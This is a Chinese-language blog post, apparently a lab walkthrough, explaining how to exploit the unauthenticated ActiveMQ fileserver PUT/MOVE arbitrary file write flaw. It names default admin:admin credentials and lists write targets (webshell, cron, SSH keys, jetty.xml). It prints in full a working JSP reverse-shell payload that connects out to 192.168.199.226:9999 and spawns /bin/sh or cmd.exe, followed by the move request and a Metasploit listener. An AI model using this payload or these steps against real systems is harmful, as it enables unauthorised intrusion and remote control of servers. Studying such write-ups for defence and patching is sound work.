<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ActiveMQ任意文件写入,">










<meta name="description" content="ActiveMQ任意文件写入背景8161为web控制台端口，本漏洞就出现在web控制台中ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。fileserver是一个RESTful API接口，我们可以通过GET、P">
<meta name="keywords" content="ActiveMQ任意文件写入">
<meta property="og:type" content="article">
<meta property="og:title" content="ActiveMQ任意文件写入">
<meta property="og:url" content="http://yoursite.com/2019/07/25/ld (2)/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="ActiveMQ任意文件写入背景8161为web控制台端口，本漏洞就出现在web控制台中ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。fileserver是一个RESTful API接口，我们可以通过GET、P">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mApALF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mAp3LD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mApwSP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mApseg.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mApomF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mA9Mkj.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/14/mA9Qts.png">
<meta property="og:updated_time" content="2019-08-14T15:36:30.115Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ActiveMQ任意文件写入">
<meta name="twitter:description" content="ActiveMQ任意文件写入背景8161为web控制台端口，本漏洞就出现在web控制台中ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。fileserver是一个RESTful API接口，我们可以通过GET、P">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/08/14/mApALF.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/25/ld (2)/">





  <title>ActiveMQ任意文件写入 | Hexo</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/25/ld (2)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ActiveMQ任意文件写入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-07-25T09:16:18+08:00">
                2019-07-25
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<h1 id="ActiveMQ任意文件写入"><a href="#ActiveMQ任意文件写入" class="headerlink" title="ActiveMQ任意文件写入"></a>ActiveMQ任意文件写入</h1><p>背景<br>8161为web控制台端口，本漏洞就出现在web控制台中<br>ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页<br>面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，<br>fileserver无需登录。<br>fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中<br>存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件<br>的缺陷，但后来发现：其使用率并不高而且文件操作容易出现漏洞<br>所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在<br>conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。<br>漏洞利用<br>本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但<br>不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后<br>使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。<br>文件写入有几种利用方法：</p>
<ol>
<li>写入webshell</li>
<li>写入cron或ssh key等文件</li>
<li>写入jar或jetty.xml等库和配置文件<br>写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api<br>两个应用都需要登录才能访问，所以有点鸡肋(但默认账号密码都是admin:admin)。写入<br>cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍<br>微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我<br>们需要知道activemq的绝对路径<br>写入webshell<br>写入webshell，需要写在admin或api应用中才能被解析，而这俩应用都需要登录才能访<br>问，默认账号密码为admin:admin，首先访问<a href="http://192.168.199.173:8161/admin/test/systemProperties.jsp，查看ActiveMQ的绝" target="_blank" rel="noopener">http://192.168.199.173:8161/admin/test/systemProperties.jsp，查看ActiveMQ的绝</a><br>对路径<br>&emsp;<br><a href="https://imgchr.com/i/mApALF" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mApALF.png" alt="mApALF.png"></a><br>访问<a href="http://192.168.199.173:8161/fileserver/并用burp抓包，方便直接修改，改为PUT" target="_blank" rel="noopener">http://192.168.199.173:8161/fileserver/并用burp抓包，方便直接修改，改为PUT</a> 包，填写文件名，并且内容写入Cknife的jsp马，返回204即为成功<br>&lt;%@page import=”java.lang.*”%&gt;<br>&lt;%@page import=”java.util.*”%&gt;<br>&lt;%@page import=”java.io.*”%&gt;<br>&lt;%@page import=”java.net.*”%&gt;</li>
</ol>
<p>&lt;%<br>class StreamConnector extends Thread<br>{<br>InputStream sn;<br>OutputStream gy;</p>
<p>StreamConnector( InputStream sn, OutputStream gy )<br>{<br>this.sn = sn;<br>this.gy = gy;<br>}</p>
<p>public void run()<br>{<br>BufferedReader jy = null;<br>BufferedWriter qvo = null;<br>try<br>{<br>jy = new BufferedReader( new InputStreamReader( this.sn ) );<br>qvo = new BufferedWriter( new OutputStreamWriter( this.gy ) );<br>char buffer[] = new char[8192];<br>int length;<br>while( ( length = jy.read( buffer, 0, buffer.length ) ) &gt; 0 )<br>{<br>qvo.write( buffer, 0, length );<br>qvo.flush();<br>}<br>} catch( Exception e ){}<br>try<br>{<br>if( jy != null )<br>jy.close();<br>if( qvo != null )<br>qvo.close();<br>} catch( Exception e ){}<br>}<br>}</p>
<p>try<br>{<br>String ShellPath;<br>if (System.getProperty(“os.name”).toLowerCase().indexOf(“windows”) == -1) {<br>ShellPath = new String(“/bin/sh”);<br>} else {<br>ShellPath = new String(“cmd.exe”);<br>}</p>
<p>Socket socket = new Socket( “192.168.199.226”, 9999 );<br>Process process = Runtime.getRuntime().exec( ShellPath );<br>( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();<br>( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();<br>} catch( Exception e ) {}<br>%&gt;<br><a href="https://imgchr.com/i/mAp3LD" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mAp3LD.png" alt="mAp3LD.png"></a><br>访问<a href="http://192.168.199.173:8161/api/" target="_blank" rel="noopener">http://192.168.199.173:8161/api/</a><br><a href="https://imgchr.com/i/mApwSP" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mApwSP.png" alt="mApwSP.png"></a><br>移动到web目录下的api文件夹(/opt/activemq/webapps/api/3.jsp)中(admin目录下jsp也<br>可被解析)<br>Destination:file:///opt/activemq/webapps/api/3.jsp<br><a href="https://imgchr.com/i/mApseg" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mApseg.png" alt="mApseg.png"></a><br>访问无报错则已经成功移动<br><a href="https://imgchr.com/i/mApomF" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mApomF.png" alt="mApomF.png"></a><br>kali机器，msfconsole启动msf，使用监听模块/exploit/multi/hanlter进行监听，网页再<br>次访问：<br><a href="https://imgchr.com/i/mA9Mkj" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mA9Mkj.png" alt="mA9Mkj.png"></a><br>&emsp;<br><a href="https://imgchr.com/i/mA9Qts" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/14/mA9Qts.png" alt="mA9Qts.png"></a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ActiveMQ任意文件写入/" rel="tag"># ActiveMQ任意文件写入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/25/ld (5)/" rel="next" title="Apache SSI 远程命令执行漏洞">
                <i class="fa fa-chevron-left"></i> Apache SSI 远程命令执行漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/25/ld (4)/" rel="prev" title="Apache HTTPD 未知后缀解析漏洞">
                Apache HTTPD 未知后缀解析漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ActiveMQ任意文件写入"><span class="nav-number">1.</span> <span class="nav-text">ActiveMQ任意文件写入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
